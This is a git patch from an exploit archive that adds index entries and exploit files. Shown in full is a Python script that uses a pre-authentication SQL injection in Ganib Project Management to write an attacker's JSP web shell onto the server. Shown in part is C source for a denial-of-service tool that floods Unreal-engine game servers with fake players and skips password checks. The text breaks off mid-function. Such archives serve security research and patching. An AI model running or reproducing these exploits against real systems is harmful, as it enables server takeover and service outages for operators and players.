From f21446479d5db7582fe572e6b676c9ee62f933d6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 7 Mar 2014 04:28:39 +0000 Subject: [PATCH] Updated 03_07_2014 --- files.csv | 22 + platforms/jsp/webapps/31874.py | 71 ++ platforms/multiple/dos/32086.c | 1125 +++++++++++++++++++++++++++ platforms/multiple/remote/32084.txt | 13 + platforms/php/webapps/31989.txt | 26 + platforms/php/webapps/32075.txt | 71 ++ platforms/php/webapps/32076.txt | 64 ++ platforms/php/webapps/32077.txt | 9 + platforms/php/webapps/32078.php | 41 + platforms/php/webapps/32079.txt | 9 + platforms/php/webapps/32080.txt | 9 + platforms/php/webapps/32081.txt | 9 + platforms/php/webapps/32082.txt | 9 + platforms/php/webapps/32083.txt | 9 + platforms/php/webapps/32085.txt | 9 + platforms/php/webapps/32087.txt | 9 + platforms/php/webapps/32088.pl | 210 +++++ platforms/php/webapps/32089.pl | 203 +++++ platforms/php/webapps/32090.txt | 7 + platforms/php/webapps/32091.txt | 12 + platforms/php/webapps/32092.txt | 9 + platforms/php/webapps/32093.txt | 8 + platforms/windows/local/32074.rb | 107 +++ 23 files changed, 2061 insertions(+) create mode 100755 platforms/jsp/webapps/31874.py create mode 100755 platforms/multiple/dos/32086.c create mode 100755 platforms/multiple/remote/32084.txt create mode 100755 platforms/php/webapps/31989.txt create mode 100755 platforms/php/webapps/32075.txt create mode 100755 platforms/php/webapps/32076.txt create mode 100755 platforms/php/webapps/32077.txt create mode 100755 platforms/php/webapps/32078.php create mode 100755 platforms/php/webapps/32079.txt create mode 100755 platforms/php/webapps/32080.txt create mode 100755 platforms/php/webapps/32081.txt create mode 100755 platforms/php/webapps/32082.txt create mode 100755 platforms/php/webapps/32083.txt create mode 100755 platforms/php/webapps/32085.txt create mode 100755 platforms/php/webapps/32087.txt create mode 100755 platforms/php/webapps/32088.pl create mode 100755 platforms/php/webapps/32089.pl create mode 100755 platforms/php/webapps/32090.txt create mode 100755 platforms/php/webapps/32091.txt create mode 100755 platforms/php/webapps/32092.txt create mode 100755 platforms/php/webapps/32093.txt create mode 100755 platforms/windows/local/32074.rb diff --git a/files.csv b/files.csv index dcdd39382..7d8726e64 100755 --- a/files.csv +++ b/files.csv @@ -28665,6 +28665,7 @@ id,file,description,date,author,platform,type,port 31871,platforms/asp/webapps/31871.txt,"Te Ecard - 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0 31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - (.PNM File) Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0 31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0 +31874,platforms/jsp/webapps/31874.py,"Ganib Project Management 2.3 - SQL Injection",2014-02-24,drone,jsp,webapps,80 31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,Sha0,linux,remote,0 31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0 31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0 @@ -28774,6 +28775,7 @@ id,file,description,date,author,platform,type,port 31986,platforms/php/webapps/31986.txt,"Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0 +31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php, SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0 31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0 @@ -28850,3 +28852,23 @@ id,file,description,date,author,platform,type,port 32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 wiki/wiki.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0 32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 work/work.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0 32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 claroline/redirector.php url Variable Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 +32074,platforms/windows/local/32074.rb,"ALLPlayer M3U Buffer Overflow",2014-03-05,metasploit,windows,local,0 +32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80 +32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent XSS Vulnerability",2014-03-05,"High-Tech Bridge SA",php,webapps,80 +32077,platforms/php/webapps/32077.txt,"IBS 0.15 'username' Parameter Cross Site Scripting Vulnerability",2008-07-17,Cyb3r-1sT,php,webapps,0 +32078,platforms/php/webapps/32078.php,"Community CMS 0.1 'include.php' Remote File Include Vulnerability",2008-07-17,N3TR00T3R,php,webapps,0 +32079,platforms/php/webapps/32079.txt,"CreaCMS edition_article/edition_article.php cfg[document_uri] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 +32080,platforms/php/webapps/32080.txt,"CreaCMS fonctions/get_liste_langue.php cfg[base_uri_admin] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 +32081,platforms/php/webapps/32081.txt,"Lemon CMS 1.10 'browser.php' Local File Include Vulnerability",2008-07-18,Ciph3r,php,webapps,0 +32082,platforms/php/webapps/32082.txt,"Def_Blog 1.0.3 comaddok.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0 +32083,platforms/php/webapps/32083.txt,"Def_Blog 1.0.3 comlook.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0 +32084,platforms/multiple/remote/32084.txt,"SmbClientParser 2.7 Perl Module Remote Command Execution Vulnerability",2008-07-18,"Jesus Olmos Gonzalez",multiple,remote,0 +32085,platforms/php/webapps/32085.txt,"phpFreeChat 1.1 'demo21_with_hardocded_urls.php' Cross Site Scripting Vulnerability",2008-07-18,ahmadbady,php,webapps,0 +32086,platforms/multiple/dos/32086.c,"SWAT 4 Multiple Denial Of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",multiple,dos,0 +32087,platforms/php/webapps/32087.txt,"EasyBookMarker 4.0 'ajaxp_backend.php' Cross-Site Scripting Vulnerability",2008-07-21,Dr.Crash,php,webapps,0 +32088,platforms/php/webapps/32088.pl,"EasyDynamicPages 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 +32089,platforms/php/webapps/32089.pl,"EasyPublish 3.0 'read' Parameter Multiple SQL Injection and Cross-Site Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 +32090,platforms/php/webapps/32090.txt,"Maran PHP Blog 'comments.php' Cross-Site Scripting Vulnerability",2008-07-21,Dr.Crash,php,webapps,0 +32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0 +32092,platforms/php/webapps/32092.txt,"Flip 3.0 'config.php' Remote File Include Vulnerability",2008-07-21,Cru3l.b0y,php,webapps,0 +32093,platforms/php/webapps/32093.txt,"phpKF 'forum_duzen.php' SQL Injection Vulnerability",2008-07-21,U238,php,webapps,0 diff --git a/platforms/jsp/webapps/31874.py b/platforms/jsp/webapps/31874.py new file mode 100755 index 000000000..6ff7e6942 --- /dev/null +++ b/platforms/jsp/webapps/31874.py @@ -0,0 +1,71 @@ +# Exploit title: Ganib 2.x SQLi +# Date: 02/02/2014 +# Exploit author: drone (@dronesec) +# More information: http://forelsec.blogspot.com/2014/02/ganib-project-management-23-multiple.html +# Vendor homepage: http://www.ganib.com/ +# Software link: http://downloads.sourceforge.net/project/ganib/Ganib-2.0/Ganib-2.0_with_jre.zip +# Version: <= 2.3 +# Fixed in: 2.4 +# Tested on: Ubuntu 12.04 (apparmor disabled) / WinXP SP3 + +from argparse import ArgumentParser +import sys +import string +import random +import requests + +""" Ganib 2.0 preauth SQLi PoC + @dronesec +""" + +def loadJSP(options): + data = '' + + try: + with open(options.jsp) as f: + for line in f.readlines(): + data += line.replace("\"", "\\\"").replace('\n', '') + except Exception, e: + print e + sys.exit(1) + + return data + +def run(options): + print '[!] Dropping %s on %s...' % (options.jsp, options.ip) + + url = "http://{0}:8080/LoginProcessing.jsp".format(options.ip) + shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5)) + + exploit = '1 UNION SELECT "{0}","1","2","3" INTO OUTFILE "{1}"' + exploit = exploit.format(loadJSP(options), options.path + '/%s.jsp' % shell) + + data = { "theAction" : "submit", + "J_USERNAME" : "test", + "J_PASSWORD" : "test", + "language" : "en", + "remember_checkbox" : "on", + "userDomain" : exploit + } + + res = requests.post(url, data=data) + if res.status_code is 200: + print '[!] Dropped at /{0}.jsp'.format(shell) + else: + print '[!] Failed to drop JSP (HTTP {0})'.format(res.status_code) + + +def parse(): + parser = ArgumentParser() + parser.add_argument("-i", help='Server ip address', action='store', dest='ip', + required=True) + parser.add_argument("-p", help='Writable web path (/var/www/ganib)', dest='path', + action='store', default='/var/www/ganib') + parser.add_argument("-j", help="JSP to deploy", dest='jsp', action='store') + + options = parser.parse_args() + options.path = options.path if options.path[-1] != '/' else options.path[:-1] + return options + +if __name__ == "__main__": + run(parse()) \ No newline at end of file diff --git a/platforms/multiple/dos/32086.c b/platforms/multiple/dos/32086.c new file mode 100755 index 000000000..5a43e6eed --- /dev/null +++ b/platforms/multiple/dos/32086.c @@ -0,0 +1,1125 @@ +source: http://www.securityfocus.com/bid/30299/info + +SWAT 4 is prone to multiple remote denial-of-service vulnerabilities because the application fails to properly handle certain input. + +An attacker may exploit these issues to crash the affected application, denying service to legitimate users. + +SWAT 4 1.1 is vulnerable; other versions may also be affected. + +/* + Copyright 2008 Luigi Auriemma + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + + http://www.gnu.org/licenses/gpl.txt +*/ + +#include +#include +#include +#include +#include +#include +#include +#include "rwbits.h" + +#ifdef WIN32 + #include + #include "winerr.h" + + #define close closesocket + #define sleep Sleep + #define ONESEC 1000 +#else + #include + #include + #include + #include + #include + #include + + #define ONESEC 1 + #define stristr strcasestr +#endif + +typedef uint8_t u8; +typedef uint16_t u16; +typedef uint32_t u32; + + + +#define VER "0.1.1" +#define PORT 7777 +#define BUFFSZ 4096 // the max supported is 576 +#define HELLBELL "BADBOY " \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \ + "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" + +#define UT2_QUERY "\x79\x00\x00\x00\x00" // not used +#define GS1_QUERY "\\info\\" // \status\ returns 3 packets, I'm too lazy to handle all of them +#define GS2_QUERY "\xfe\xfd\x00" "\x00\x00\x00\x00" "\xff\x00\x00" "\x00" +#define GS3_QUERY "\xfe\xfd\x09" "\x00\x00\x00\x00" +#define GS3_QUERYX "\xfe\xfd\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\xff\x00\x00" "\x00" + + + +void fake_players_socket(int sd) { // simple to add function for not closing sockets + #define MAXFAKESOCKS 64 + static int socks[MAXFAKESOCKS], + socksp, + init = 1; + int i; + + if(init || (sd < 0)) { + for(i = 0; i < MAXFAKESOCKS; i++) socks[i] = -1; + socksp = 0; + init = 0; + return; + } + if(socksp >= MAXFAKESOCKS) socksp = 0; + if(socks[socksp] >= 0) close(socks[socksp]); + socks[socksp] = sd; + socksp++; +} +void activate_fix(int *fix); +int unreal_send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int *chall, u8 **errmsg); +u8 *rndhash(int size); +int unreal_info(u8 *buff, struct sockaddr_in *peer); +int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...); +void fgetz(u8 *data, int len); +int calc_authresp(int num); +int write_unrnum(int num, u8 *buff, int bits); +int read_unrnum(int *num, u8 *buff, int bits); +int write_unrser(int num, u8 *buff, int bits, int max); +u8 *unreal_parse_pck(u8 *buff, int size, int *chall); +int unreal_build_pck(u8 *buff, int pck, ...); +int read_unreal_index(u8 *index_num, int *ret); +int write_unreal_index(int number, u8 *index_num); +int read_bitmem(u8 *in, int inlen, u8 *out, int bits); +int write_bitmem(u8 *in, int inlen, u8 *out, int bits); +int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err); +int timeout(int sock, int secs); +u32 resolv(char *host); +void std_err(void); + + + +int aafix = 0, // America's Army uses 0x800 instead of 0x3ff + u3fix = 0, // Unreal 3 no longer uses index numbers + rvfix = 0, // RavenShiel uses 0x50f instead of 0x3ff (this is useless since it's enough compatible with AA) + pariahfix = 0, // Pariah + movfix = 0, // Men of Valor + //khgfix = 0, // Klingon Honor Guard uses readbits 16 1 9 16 3 and 12 instead of index numbers + // unreal1fix, similar to above... not needed to support at the moment + verbose = 0, + challenge_fix = 0, + hex_challenge = 0, + force_team = 0, + force_fix = 0, + send_verbose = 0, + fast_connect = 1, + first_time = 1; +u8 *gamestatefix[] = { + "", // none + // the order of the hash of GAMESTATE checked in memory is 77778888555566661111222233334444 + //the second part of the GAMESTATE hash is the MD5 of "SCR3W3DD@P00CH" and the MD5 of the file (for example SwatGame.u) + // Swat4 requires 32 successful GAMESTATEs, it's enough to send the same one 32 times, + // but at the moment my tool doesn't support the sending of more packets + "GAMESTATE FA1F998D4D4C2E5F492B79FF1D58488E5e2b7c57161e65909c8c7b01923aa4c4", // UT2XMP demo + "GAMESTATE 520996A03FACE2BE4FF9A24F17158B3B7c07dc2b72044ef0e6278707e9e8b0f6", // UT2003 + // "GAMESTATE D2ECC882E8945E68413DDF3DCB7A1BBEfe95745de189869e61331593a64f33de", // SWAT4 + NULL + }; + + + +int main(int argc, char *argv[]) { + struct sockaddr_in peer, + peerl; + int i, + sd, + len, + pck, + ver, + chall, + onlyone = 0, + infoquery = 1, + sendauth = 0, + gamestatefixes = 0, + random_username = 0, + force_closesock = 0; + u16 port = PORT; + u8 buff[BUFFSZ], + hello[BUFFSZ] = "", + auth[BUFFSZ] = "", + login[BUFFSZ] = "", + hellover[64] = "", + pass[64] = "", + tmpchall[12], + *cmd_only = NULL, + *cmd_plus = "", + *login_plus = "", + *errmsg, + *host, + *p; + +#ifdef WIN32 + WSADATA wsadata; + WSAStartup(MAKEWORD(1,0), &wsadata); +#endif + + setbuf(stdout, NULL); + + fputs("\n" + "Unreal engine basic client and Fake Players DoS "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 3) { + printf("\n" + "Usage: %s [options] \n" + "\n" + "Options:\n" + "-c \"C\" send only the custom command C\n" + "-C \"C\" send the custom command C plus the others needed to join\n" + "-l \"S\" add a custom URL string S to the LOGIN command, for example:\n" + " -l \"Index.ut2?Name=player?Class=EnginePawn?Character=Jakob?team=1\"\n" + " -l \"?Name=player?UserName=UserName?MAC=\"\n" + //" -l \"Entry.aao?Name=Recruit?Class=AGP_Characters.AGP_Character?team=255?UserName=UserName?MAC=\"\n" + "-f use the full method (HELLO + LOGIN and so on), needed with some games\n" + " of the Unreal 1 engine to avoid the crash of the server\n" + //"-u send a LOGIN command with a random UserName field (for America's Army)\n" AUTOMATIC!!! + //"-a send the AUTH command\n" AUTOMATIC!!! + "-i do not query the server for informations and for hostport\n" + "-b Windows dedicated server hell bell attack through the BADBOY command\n" + "-v verbose mode, show all the commands received from the server\n" + "-V show all the commands sent by this tool\n" + "-1 only one fake player, debug\n" + "-x N force the activation of a specific compatibility fix, where N is for:\n" + " 1 = America's Army 2 = Unreal 3 engine 3 = Raven Shield\n" + " 4 = Pariah 5 = Men of Valor\n" + "\n" + "works also with servers protected by password without knowing the keyword!\n" + "should work with almost any game based on the Unreal engine (1, 2 and 3)\n" + "\n", argv[0]); + exit(1); + } + + argc -= 2; + for(i = 1; i < argc; i++) { + if(((argv[i][0] != '-') && (argv[i][0] != '/')) || (strlen(argv[i]) != 2)) { + printf("\nError: wrong argument (%s)\n", argv[i]); + exit(1); + } + switch(argv[i][1]) { + case 'v': { + verbose = 1; + break; + } + case 'V': { + send_verbose = 1; + break; + } + case 'f': { + fast_connect = 0; + break; + } + case 'c': { + cmd_only = argv[++i]; + break; + } + case 'C': { + cmd_plus = argv[++i]; + break; + } + case 'l': { + login_plus = argv[++i]; + fast_connect = 0; + break; + } + case '1': { + onlyone = 1; + break; + } + case 'i': { + infoquery = 0; + break; + } + case 'a': { + sendauth = 1; + break; + } + case 'b': { + cmd_only = HELLBELL; + force_closesock = 1; + break; + } + case 'u': { + random_username = 1; + fast_connect = 0; + break; + } + case 'x': { + force_fix = atoi(argv[++i]); + break; + } + default: { + printf("\nError: wrong argument (%s)\n", argv[i]); + exit(1); + } + } + } + + host = argv[argc]; + port = atoi(argv[argc + 1]); + + peer.sin_addr.s_addr = resolv(host); + peer.sin_port = htons(port); + peer.sin_family = AF_INET; + + peerl.sin_addr.s_addr = INADDR_ANY; + peerl.sin_port = htons(time(NULL)); + peerl.sin_family = AF_INET; + + printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port)); + + if(infoquery && (ntohs(peer.sin_port) != 7777)) { + ver = unreal_info(buff, &peer); + if(ver) sprintf(hellover, "MINVER=%d VER=%d", ver, ver); + } + + /* full list of parameters and values parsed by various games which use the Unreal engine + USERFLAG (number) + HELLO + MINVER= + VER= + AUTH + HASH= + RESPONSE= + USERNAME= + PASSWORD= + GM= + NETSPEED (number >= 1800) + HAVE + GUID= + GEN= + SKIP + GUID= + LOGIN + RESPONSE= + URL= + JOIN + BADBOY (followed by the string visualized in the console) + PETE + PKT= + PKG= + REPEAT + OPENVOICE (number) + // UT2003 + CRITOBJCNT (number, similar to PETE) + GAMESTATE (ID) + NAME= + // SWAT4 + GAMESPYRESPONSE + RS= + GAMESPYSTATRESPONSE + PID= + RS= + VERIFYCONTENT + FILE= + MD5= + GAMECONFIGCOUNT (number) + GAMECONFIG + CONFIGFILE= + CONFIGMD5= + // Warpath and Pariah + JOINSPLIT + GAMEPAD= + GUESTNUM= + DISABLESPLIT + GAMEPAD= + EPIC (hash) + // Raven Shield + SERVERPING + ARMPATCH + // UT3 + DEBUG + ABORT + GUID= + JOINSPLIT + */ + // generic in-game commands: open namecount start map servertravel say disconnect + + printf("\n- start attack:\n"); + + if(force_fix) { + sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); + if(sd < 0) std_err(); + errmsg = unreal_parse_pck("\0\0", 0, NULL); + goto handle_error_message; + } + + for(;;) { + pck = 0; + printf("\n Player: "); + + sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); + if(sd < 0) std_err(); + do { + peerl.sin_port++; + } while(bind(sd, (struct sockaddr *)&peerl, sizeof(struct sockaddr_in)) < 0); + + if(!fast_connect || u3fix || movfix) { // Unreal 3 requires the LOGIN packet, while MOV crashes! + sprintf(hello, "HELLO %sREVISION=0 %s", u3fix ? "P=1 " : "", hellover); + + len = unreal_build_pck(buff, pck++, + hello, + NULL); + + len = unreal_send_recv(sd, buff, len, buff, BUFFSZ, &peer, &chall, &errmsg); + if(len < 0) goto handle_error_message; + + //sprintf(login, "LOGIN RESPONSE=%i URL=Index.ut2?Name=player?Class=EnginePawn?Character=Jakob?team=1%s%s", chall, pass[0] ? "?password=" : "", pass); + sprintf(tmpchall, hex_challenge ? "%08X" : "%i", chall); // I don't know if this is right, seems that U3 doesn't check the challenge! + sprintf(login, "LOGIN RESPONSE=%s URL=%s%s%s%s", tmpchall, login_plus, force_team ? "?Team=1" : "", pass[0] ? "?password=" : "", pass); + if(random_username) sprintf(login + strlen(login), "?UserName=%s", rndhash(5)); + } + + if(sendauth) { + sprintf(auth, "AUTH HASH=%s GM=%s USERNAME=%s PASSWORD=%s", rndhash(16), rndhash(66), rndhash(4), rndhash(16)); + } + + if(cmd_only) { + len = unreal_build_pck(buff, pck++, + cmd_only, + NULL); + } else { + len = unreal_build_pck(buff, pck++, + auth, // causes only problems! + login, + //"NETSPEED 1800", // useless + "PETE PKT=1 PKG=1", + "REPEAT", + "CRITOBJCNT 1", + gamestatefix[gamestatefixes], + cmd_plus, + "JOIN", + NULL); + } + if(len > BUFFSZ) { + printf("\nError: your packet is too big\n"); + exit(1); + } + len = unreal_send_recv(sd, buff, len, buff, BUFFSZ, &peer, NULL, &errmsg); + if(len < 0) goto handle_error_message; + + if(onlyone) { + if(verbose) { + for(;;) { // show any other incoming message + len = send_recv(sd, NULL, 0, buff, BUFFSZ, &peer, 0); + if(len < 60) break; // break if too small + errmsg = unreal_parse_pck(buff, len, NULL); + if(errmsg) break; + } + } + printf("\n- done\n"); + exit(1); + } + + if(force_closesock) { + close(sd); + } else { + fake_players_socket(sd); + } + continue; + +handle_error_message: + close(sd); + if(!errmsg) continue; + if(strstr(errmsg, "UPGRADE")) { + p = strstr(errmsg, "MINVER"); // UPGRADE MINVER= VER= + if(!p) exit(1); + strncpy(hellover, p, sizeof(hellover)); + hellover[sizeof(hellover) - 1] = 0; + } else if(strstr(errmsg, "SERVERFULL") || stristr(errmsg, "capacity") || stristr(errmsg, "MaxedOutMessage") || stristr(errmsg, "players")) { + printf(" server full "); + for(i = 3; i; i--) { + printf("%d\b", i); + sleep(ONESEC); + } + } else if(strstr(errmsg, "NEEDPW") || strstr(errmsg, "WRONGPW") || stristr(errmsg, "password") || stristr(errmsg, "PassWd")) { + printf("\n- server is protected with password, insert the keyword: "); + fgetz(pass, sizeof(pass)); + } else if(strstr(errmsg, "BRAWL")) { + gamestatefixes++; + if(!gamestatefix[gamestatefixes]) { + printf("\nError: this game needs one or more GAMESTATE commands not implemented\n"); + exit(1); + } + printf("\n- %s", gamestatefix[gamestatefixes]); + } else if(stristr(errmsg, "Username")) { + if(random_username) exit(1); + printf("\n- activate random UserName in the LOGIN command"); + random_username = 1; + fast_connect = 0; + } else if(stristr(errmsg, "Could not find team")) { + if(force_team) exit(1); + printf("\n- activate team fix"); + force_team = 1; + fast_connect = 0; + } else if(stristr(errmsg, "stats")) { + if(sendauth) exit(1); + sendauth = 1; + } else if(stristr(errmsg, "CHALLENGE")) { + challenge_fix++; + if(challenge_fix == 1) { + printf("\n- activate the Frontline Fuel of War challenge fix"); + } else if(!hex_challenge) { + printf("\n- activate the hexadecimal challenge fix"); + challenge_fix = 0; + hex_challenge = 1; + } else { + printf("\n" + "Error: seems that this game requires a specific challenge-response algorithm\n" + "\n"); + exit(1); + } + } else if(!strcmp(errmsg, "NOFIX")) { + printf("\n- activate full connect without compatibility fixes"); + activate_fix(NULL); + } else if(!strcmp(errmsg, "AAFIX")) { + printf("\n- activate the America's Army compatibility"); + activate_fix(&aafix); + } else if(!strcmp(errmsg, "U3FIX")) { + printf("\n- activate the Unreal 3 engine compatibility"); + activate_fix(&u3fix); + } else if(!strcmp(errmsg, "RVFIX")) { + printf("\n- activate the Raven Shield compatibility"); + activate_fix(&rvfix); + } else if(!strcmp(errmsg, "PARIAHFIX")) { + printf("\n- activate the Pariah/Warpath compatibility"); + activate_fix(&pariahfix); + } else if(!strcmp(errmsg, "MOVFIX")) { + printf("\n- activate the Men of Valor compatibility"); + activate_fix(&movfix); + } else { + printf("\nError: %s\n", errmsg); + exit(1); + } + } + return(0); +} + + + +void activate_fix(int *fix) { + aafix = 0; + u3fix = 0; + rvfix = 0; + pariahfix = 0; + movfix = 0; + if(fix) *fix = 1; +} + + + +int unreal_send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int *chall, u8 **errmsg) { + int len; + + len = send_recv(sd, in, insz, out, outsz, peer, first_time); + if(len < 0) { + if(len == -1) std_err(); + printf(" players_per_IP limit or timed out "); + sleep(ONESEC); + *errmsg = NULL; + return(-1); + } + if(first_time) first_time = 0; + +#ifdef DUMPPCK + static int num = 0; + FILE *fd; + char fname[64]; + sprintf(fname, "unrealfp_pck.%03d", num++); + fd = fopen(fname, "wb"); + if(!fd) std_err(); + fwrite(out, 1, len, fd); + fclose(fd); +#endif + + *errmsg = unreal_parse_pck(out, len, chall); + if(*errmsg) return(-1); + return(len); +} + + + +u8 *rndhash(int size) { + static u32 rnd = 0; + static int sel = 0; + static u8 out[4][256]; + static const u8 hex[16] = "0123456789abcdef"; + int i; + u8 *ret, + *p; + + if(!rnd) rnd = ~time(NULL); + + ret = out[sel++ & 3]; + p = ret; + for(i = 0; i < size; i++) { + rnd = (rnd * 0x343FD) + 0x269EC3; + *p++ = hex[(rnd & 0xff) >> 4]; + *p++ = hex[(rnd & 0xff) & 15]; + } + *p = 0; + return(ret); +} + + + +int unreal_info(u8 *buff, struct sockaddr_in *peer) { + u32 chall; + int sd, + len, + type, + retver = 0; + u8 gs3[32], + *gamever = NULL, + *hostport = NULL; + + sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); + if(sd < 0) std_err(); + + printf("\n- send info queries\n"); + send_recv(sd, GS1_QUERY, sizeof(GS1_QUERY) - 1, NULL, 0, peer, 0); + send_recv(sd, GS2_QUERY, sizeof(GS2_QUERY) - 1, NULL, 0, peer, 0); + send_recv(sd, GS3_QUERY, sizeof(GS3_QUERY) - 1, NULL, 0, peer, 0); + len = send_recv(sd, NULL, 0, buff, BUFFSZ, peer, 0); + if(len < 0) goto quit; + if(buff[0] == '\\') { + type = 1; + } else { + if(len < 8) { + type = 2; + len = send_recv(sd, NULL, 0, buff, BUFFSZ, peer, 0); + if(len < 0) goto quit; + } else { + type = 3; + memcpy(gs3, GS3_QUERYX, sizeof(GS3_QUERYX) - 1); + chall = atoi(buff + 5); + gs3[7] = chall >> 24; + gs3[8] = chall >> 16; + gs3[9] = chall >> 8; + gs3[10] = chall; + len = send_recv(sd, gs3, sizeof(GS3_QUERYX) - 1, buff, BUFFSZ, peer, 0); + if(len < 0) goto quit; + } + } + + printf("\n- handle reply:\n"); + gs_handle_info(buff, len, + (type == 1) ? 1 : 0, (type == 1) ? '\\' : '\0', (type == 1) ? 0 : 5, 0, + "gamever", &gamever, + "hostport", &hostport, + NULL, NULL); + + if(gamever) { + retver = atoi(gamever); + } + if(hostport) { + peer->sin_port = htons(atoi(hostport)); + printf("\n- set hostport %hu\n", ntohs(peer->sin_port)); + } + +quit: + close(sd); + return(retver); +} + + + +int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...) { + va_list ap; + int i, + args, + found; + u8 **parz, + ***valz, + *p, + *limit, + *par, + *val; + + va_start(ap, rear); + for(i = 0; ; i++) { + if(!va_arg(ap, u8 *)) break; + if(!va_arg(ap, u8 **)) break; + } + va_end(ap); + + args = i; + parz = malloc(args * sizeof(u8 *)); + valz = malloc(args * sizeof(u8 **)); + + va_start(ap, rear); + for(i = 0; i < args; i++) { + parz[i] = va_arg(ap, u8 *); + valz[i] = va_arg(ap, u8 **); + *valz[i] = NULL; + } + va_end(ap); + + found = 0; + limit = data + datalen - rear; + *limit = 0; + data += front; + par = NULL; + val = NULL; + + for(p = data; (data < limit) && p; data = p + 1, nt++) { + p = strchr(data, chr); + if(p) *p = 0; + + if(nt & 1) { + if(!par) continue; + val = data; + printf(" %30s %s\n", par, val); + + for(i = 0; i < args; i++) { + if(!stricmp(par, parz[i])) *valz[i] = val; + } + } else { + par = data; + } + } + + free(parz); + free(valz); + return(found); +} + + + +void fgetz(u8 *data, int len) { + u8 *p; + + 